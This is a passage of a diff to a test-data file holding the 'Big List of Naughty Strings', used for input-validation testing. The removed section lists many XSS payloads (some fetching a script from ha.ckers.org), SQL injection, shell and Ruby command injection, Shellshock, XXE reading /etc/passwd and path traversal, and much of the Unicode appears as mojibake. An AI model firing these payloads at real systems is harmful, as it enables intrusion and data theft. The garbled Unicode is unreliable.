onkeyup='javascript:alert(123)", -"<script\\x20type=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x09type=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>", -"'`\"><\\x3Cscript>javascript:alert(1)</script>", -"'`\"><\\x00script>javascript:alert(1)</script>", -"ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF", -"ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF", -"ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF", -"<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>", -"\"`'><script>\\x3Bjavascript:alert(1)</script>", -"\"`'><script>\\x0Djavascript:alert(1)</script>", -"\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>", -"\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>", -"\"`'><script>\\x09javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>", -"\"`'><script>\\x00javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>", -"\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>", -"\"`'><script>\\x0Cjavascript:alert(1)</script>", -"\"`'><script>\\x2Bjavascript:alert(1)</script>", -"\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>", -"\"`'><script>-javascript:alert(1)</script>", -"\"`'><script>\\x0Ajavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>", -"\"`'><script>\\x7Ejavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>", -"\"`'><script>\\xC2\\x85javascript:alert(1)</script>", -"\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>", -"\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>", -"\"`'><script>\\x21javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>", -"\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>", -"\"`'><script>\\x0Bjavascript:alert(1)</script>", -"\"`'><script>\\x20javascript:alert(1)</script>", -"\"`'><script>\\xC2\\xA0javascript:alert(1)</script>", -"<img \\x00src=x onerror=\"alert(1)\">", -"<img \\x47src=x onerror=\"javascript:alert(1)\">", -"<img \\x11src=x onerror=\"javascript:alert(1)\">", -"<img \\x12src=x onerror=\"javascript:alert(1)\">", -"<img\\x47src=x onerror=\"javascript:alert(1)\">", -"<img\\x10src=x onerror=\"javascript:alert(1)\">", -"<img\\x13src=x onerror=\"javascript:alert(1)\">", -"<img\\x32src=x onerror=\"javascript:alert(1)\">", -"<img\\x47src=x onerror=\"javascript:alert(1)\">", -"<img\\x11src=x onerror=\"javascript:alert(1)\">", -"<img \\x47src=x onerror=\"javascript:alert(1)\">", -"<img \\x34src=x onerror=\"javascript:alert(1)\">", -"<img \\x39src=x onerror=\"javascript:alert(1)\">", -"<img \\x00src=x onerror=\"javascript:alert(1)\">", -"<img src\\x09=x onerror=\"javascript:alert(1)\">", -"<img src\\x10=x onerror=\"javascript:alert(1)\">", -"<img src\\x13=x onerror=\"javascript:alert(1)\">", -"<img src\\x32=x onerror=\"javascript:alert(1)\">", -"<img src\\x12=x onerror=\"javascript:alert(1)\">", -"<img src\\x11=x onerror=\"javascript:alert(1)\">", -"<img src\\x00=x onerror=\"javascript:alert(1)\">", -"<img src\\x47=x onerror=\"javascript:alert(1)\">", -"<img src=x\\x09onerror=\"javascript:alert(1)\">", -"<img src=x\\x10onerror=\"javascript:alert(1)\">", -"<img src=x\\x11onerror=\"javascript:alert(1)\">", -"<img src=x\\x12onerror=\"javascript:alert(1)\">", -"<img src=x\\x13onerror=\"javascript:alert(1)\">", -"<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", -"<img src=x onerror=\\x09\"javascript:alert(1)\">", -"<img src=x onerror=\\x10\"javascript:alert(1)\">", -"<img src=x onerror=\\x11\"javascript:alert(1)\">", -"<img src=x onerror=\\x12\"javascript:alert(1)\">", -"<img src=x onerror=\\x32\"javascript:alert(1)\">", -"<img src=x onerror=\\x00\"javascript:alert(1)\">", -"<a href=javascript:javascript:alert(1)>XXX</a>", -"<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", -"<img src onerror /\" '\"= alt=javascript:alert(1)//\">", -"<title onpropertychange=javascript:alert(1)></title><title title=>", -"<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", -"<!--[if]><script>javascript:alert(1)</script -->", -"<!--[if<img src=x onerror=javascript:alert(1)//]> -->", -"<script src=\"/\%(jscript)s\"></script>", -"<script src=\"\\%(jscript)s\"></script>", -"<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", -"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", -"<IMG SRC=# onmouseover=\"alert('xxs')\">", -"<IMG SRC= onmouseover=\"alert('xxs')\">", -"<IMG onmouseover=\"alert('xxs')\">", -"<IMG SRC=javascript:alert('XSS')>", -"<IMG SRC=javascript:alert('XSS')>", -"<IMG SRC=javascript:alert('XSS')>", -"<IMG SRC=\"jav ascript:alert('XSS');\">", -"<IMG SRC=\"jav	ascript:alert('XSS');\">", -"<IMG SRC=\"jav
ascript:alert('XSS');\">", -"<IMG SRC=\"jav
ascript:alert('XSS');\">", -"perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out", -"<IMG SRC=\"  javascript:alert('XSS');\">", -"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", -"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", -"<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", -"<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", -"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", -"<SCRIPT SRC=//ha.ckers.org/.j>", -"<IMG SRC=\"javascript:alert('XSS')\"", -"<iframe src=http://ha.ckers.org/scriptlet.html <", -"\\\";alert('XSS');//", -"<u oncopy=alert()> Copy me</u>", -"<i onwheel=alert(1)> Scroll over me </i>", -"<plaintext>", -"http://a/%%30%30", -"</textarea><script>alert(123)</script>", - -// SQL Injection -// -// Strings which can cause a SQL injection if inputs are not sanitized - -"1;DROP TABLE users", -"1'; DROP TABLE users-- 1", -"' OR 1=1 -- 1", -"' OR '1'='1", -" ", -"%", -"_", - -// Server Code Injection -// -// Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) - -"-", -"--", -"--version", -"--help", -"$USER", -"/dev/null; touch /tmp/blns.fail ; echo", -"`touch /tmp/blns.fail`", -"$(touch /tmp/blns.fail)", -"@{[system \"touch /tmp/blns.fail\"]}", - -// Command Injection (Ruby) -// -// Strings which can call system commands within Ruby/Rails applications - -"eval(\"puts 'hello world'\")", -"System(\"ls -al /\")", -"`ls -al /`", -"Kernel.exec(\"ls -al /\")", -"Kernel.exit(1)", -"%x('ls -al /')", - -// XXE Injection (XML) -// -// String which can reveal system files when parsed by a badly configured XML parser - -"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>", - -// Unwanted Interpolation -// -// Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. - -"$HOME", -"$ENV{'HOME'}", -"%d", -"%s", -"{0}", -"%*.*s", -"File:///", - -// File Inclusion -// -// Strings which can cause user to pull in files that should not be a part of a web server - -"../../../../../../../../../../../etc/passwd%00", -"../../../../../../../../../../../etc/hosts", - -// Known CVEs and Vulnerabilities -// -// Strings that test for known vulnerabilities - -"() { 0; }; touch /tmp/blns.shellshock1.fail;", -"() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", -"<<< %s(un='%s') = %u", -"+++ATH0", - -// MSDOS/Windows Special Filenames -// -// Strings which are reserved characters in MSDOS/Windows - -"CON", -"PRN", -"AUX", -"CLOCK$", -"NUL", -"A:", -"ZZ:", -"COM1", -"LPT1", -"LPT2", -"LPT3", -"COM2", -"COM3", -"COM4", - -// IRC specific strings -// -// Strings that may occur on IRC clients that make security products freak out - -"DCC SEND STARTKEYLOGGER 0 0 0", - -// Scunthorpe Problem -// -// Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) - -"Scunthorpe General Hospital", -"Penistone Community Church", -"Lightwater Country Park", -"Jimmy Clitheroe", -"Horniman Museum", -"shitake mushrooms", -"RomansInSussex.co.uk", -"http://www.cum.qc.ca/", -"Craig Cockburn, Software Specialist", -"Linda Callahan", -"Dr. Herman I. Libshitz", -"magna cum laude", -"Super Bowl XXX", -"medieval erection of parapets", -"evaluate", -"mocha", -"expression", -"Arsenal canal", -"classic", -"Tyson Gay", -"Dick Van Dyke", -"basement", - -// Human injection -// -// Strings which may cause human to reinterpret worldview - -"If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.", - -// Terminal escape codes -// -// Strings which punish the fools who use cat/type on this file - -"Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue", -"But now...[20Cfor my greatest trick...[8m", -"The quick brown fox... [Beeeep]", - -// iOS Vulnerabilities -// -// Strings which crashed iMessage in various versions of iOS - -"Powerトマトマᄉムᄄマトマトᄉムᄄマᄆᄆヒ ¢ᆬᆪ ¢ᆬᆪh ¢ᆬᆪ ¢ᆬᆪ¥ニラ", -"゚マᄈ0゚フネᄌマ" -};
\ No newline at end of file + // sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt + + // Reserved Strings + // + // Strings which may be used elsewhere in code + + "undefined", "undef", "null", "NULL", "(null)", "nil", "NIL", "true", "false", "True", "False", "TRUE", "FALSE", "None", "hasOwnProperty", "\\", "\\\\", + + // Numeric Strings + // + // Strings which can be interpreted as numeric + + "0", "1", "1.00", "$1.00", "1/2", "1E2", "1E02", "1E+02", "-1", "-1.00", "-$1.00", "-1/2", "-1E2", "-1E02", "-1E+02", "1/0", "0/0", "-2147483648/-1", + "-9223372036854775808/-1", "-0", "-0.0", "+0", "+0.0", "0.00", "0..0", ".", "0.0.0", "0,00", "0,,0", ",", "0,0,0", "0.0/0", "1.0/0.0", "0.0/0.0", "1,0/0,0", + "0,0/0,0", "--1", "-", "-.", "-,", "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", "NaN", "Infinity", + "-Infinity", "INF", "1#INF", "-1#IND", "1#QNAN", "1#SNAN", "1#IND", "0x0", "0xffffffff", "0xffffffffffffffff", "0xabad1dea", + "123456789012345678901234567890123456789", "1,000.00", "1 000.00", "1'000.00", "1,000,000.00", "1 000 000.00", "1'000'000.00", "1.000,00", "1 000,00", + "1'000,00", "1.000.000,00", "1 000 000,00", "1'000'000,00", "01000", "08", "09", "2.2250738585072011e-308", + + // Special Characters + // + // ASCII punctuation. All of these characters may need to be escaped in some + // contexts. Divided into three groups based on (US-layout) keyboard position. + + ",./;'[]\\-=", "<>?:\"{}|_+", "!@#$%^&*()`~", + + // Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, + // and U+007F (DEL) + // Often forbidden to appear in various text-based file formats (e.g. XML), + // or reused for internal delimiters on the theory that they should never + // appear in input. + // The next line may appear to be blank or mojibake in some viewers. + "", + + // Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. + // Commonly misinterpreted as additional graphic characters. + // The next line may appear to be blank, mojibake, or dingbats in some viewers. + "ᅡタᅡチᅡツᅡテᅡトᅡニᅡヌᅡネᅡノᅡハᅡヒᅡフᅡヘᅡホᅡマᅡミᅡムᅡメᅡモᅡヤᅡユᅡヨᅡラᅡリᅡルᅡレᅡロᅡワᅡンᅡ゙ᅡ゚", + + // Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode + // version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), + // and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often + // treated as whitespace in some contexts. + // This file unfortunately cannot express strings containing + // U+0000, U+000A, or U+000D (NUL, LF, CR). + // The next line may appear to be blank or mojibake in some viewers. + // The next line may be flagged for \"trailing whitespace\" in some viewers. + " ", " ᅡナ £レタ¬タタ¬タチ¬タツ¬タテ¬タト¬タナ¬タニ¬タヌ¬タネ¬タノ¬タハ¬タヒ¬タᄄ¬タᄅ¬タᆵ¬チ゚ ̄タタ", + + // Unicode additional control characters: all of the characters with + // general category Cf (in Unicode 8.0.0). + // The next line may appear to be blank or mojibake in some viewers. + "ᅡᆳタチツテトナワᅴンᅵマ£ᅠホ¬タヒ¬タフ¬タヘ¬タホ¬タマ¬タᆰ¬タᆱ¬タᆲ¬タᆳ¬タᆴ¬チᅠ¬チᄀ¬チᄁ¬チᆪ¬チᄂ¬チᆭ¬チᄃ¬チᄄ¬チᄅ¬チᆰ¬チᆱ¬チᆲ¬チᆳ¬チᆴ¬チᆵᄏ" + "ᄍᄎᄏムツᄑロᄇᅠロᄇᄀロᄇᄁロᄇᆪンナᄈンナᄡンナᄉンナᄊンナᄋンナᄌンナᄍンナᄎᅠタチᅠタᅠᅠタᄀᅠタᄁᅠタᆪᅠタᄂᅠ" + "タᆬᅠタᆭᅠタᄃᅠタᄄᅠタᄅᅠタᆰᅠタᆱᅠタᆲᅠタᆳᅠタᆴᅠタᆵᅠタᄚᅠタᄆᅠタᄇᅠタᄈᅠタᄡᅠタᄉᅠタᄊᅠタᄋᅠタᄌ" + "ᅠタᄍᅠタᄎᅠタᄏᅠタᄐᅠタᄑᅠタᄒᅠタᅠチタᅠチチᅠチツᅠチテᅠチトᅠチナᅠチニᅠチヌᅠチネᅠチノᅠチハᅠチヒ" + "ᅠチフᅠチヘᅠチホᅠチマᅠチミᅠチムᅠチメᅠチモᅠチヤᅠチユᅠチヨᅠチラᅠチリᅠチルᅠチレᅠチロᅠチワᅠチンᅠヂ" + "ᅠチ゚ᅠチᅠᅠチᄀᅠチᄁᅠチᆪᅠチᄂᅠチᆬᅠチᆭᅠチᄃᅠチᄄᅠチᄅᅠチᆰᅠチᆱᅠチᆲᅠチᆳᅠチᆴᅠチᆵᅠチᄚᅠチᄆ" + "ᅠチᄇᅠチᄈᅠチᄡᅠチᄉᅠチᄊᅠチᄋᅠチᄌᅠチᄍᅠチᄎᅠチᄏᅠチᄐᅠチᄑᅠチᄒᅠチ" + "", + + // \"Byte order marks\", U+FEFF and U+FFFE, each on its own line. + // The next two lines may appear to be blank or mojibake in some viewers. + "ᄏ", "ᄒ", + + // Unicode Symbols + // + // Strings which contain common unicode symbols (e.g. smart quotes) + + "ᅫᄅ¬ノネᅢᄃ¬ネレ¬ネᆱᅨワᅡᄉ¬ノᄂ¬ノᆬᅢᄋ", "ᅢᆬᅢ゚¬ネツᅥメᅡ례ル¬ネニᅨレᅡᆲ¬タᆭᅢᆭ", "ᅤモ¬ネムᅡᄡᅡᆴ¬タᅠᅡᆬᅡ뗴ニᅢ죄タ¬タワ¬タリ", + "ᅡᄀ¬ト깏ᅡᄁ¬ネ゙ᅡ다ᄊ¬タ깕ᅡᄎ¬タモ¬ノᅠ", + "ᅡ졔ロᅢヌ¬ラハᅣ몌ワᅢツᅡᆵᅨリᅡ", "ᅢナᅢヘᅢホᅢマᅨンᅢモᅢヤᆪᅢメᅢレᅢニ¬リテ", + "ᅤメ¬ダᅡᄡ¬タᄚᅨヌᅢチᅡ뗴ニᅢリ¬ネマ¬タン¬タル", "`¬チト¬ツᆲ¬タᄍ¬タᄎᆲチᆲツ¬タ가ᄚᅡᄋ¬タレ¬タヤᅡᄆ", + "¬ナロ¬ナワ¬ナン¬ナ゙", + "チツテトナニヌネノハヒフヘホマミムメモヤユヨラリルレロワン゙゚ᅠᄀᄁᆪᄂᆬᆭ" + "ᄃᄄᄅᆰᆱᆲᆳᆴᆵᄚᄆᄇᄈᄡᄉᄊᄋᄌᄍᄎᄏᄐᄑᄒタチツテトナニヌネノハヒフ" + "ヘホマ", + "ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅ", + + // Unicode Subscript/Superscript/Accents + // + // Strings which contain unicode subscripts/superscripts; can cause rendering issues + + "¬チᄚ¬チᄡ¬チᄉ", "¬ツタ¬ツチ¬ツツ", "¬チᄚ¬チᄡ¬チᄉ¬ツタ¬ツチ¬ツツ", + "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢" + "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ" + "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ " + "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢" + "ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ" + "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ " + "¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢" + 